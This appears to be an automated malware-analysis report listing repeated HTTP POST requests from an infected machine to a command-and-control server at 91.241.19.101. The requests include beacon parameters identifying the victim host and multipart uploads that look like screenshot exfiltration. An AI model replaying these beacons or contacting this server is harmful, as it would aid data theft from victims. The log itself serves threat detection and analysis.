          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----cb06620fdbfb5a3e502f93b69d2ed9e3Host: 91.241.19.101Content-Length: 86508Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----cb06620fdbfb5a3e502f93b69d2ed9e3Host: 91.241.19.101Content-Length: 86508Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----d2fcd16484b4dc546a2495c261c433dbHost: 91.241.19.101Content-Length: 86499Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----d4316affd2e48a2f64fddcbb46f39e4cHost: 91.241.19.101Content-Length: 86733Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
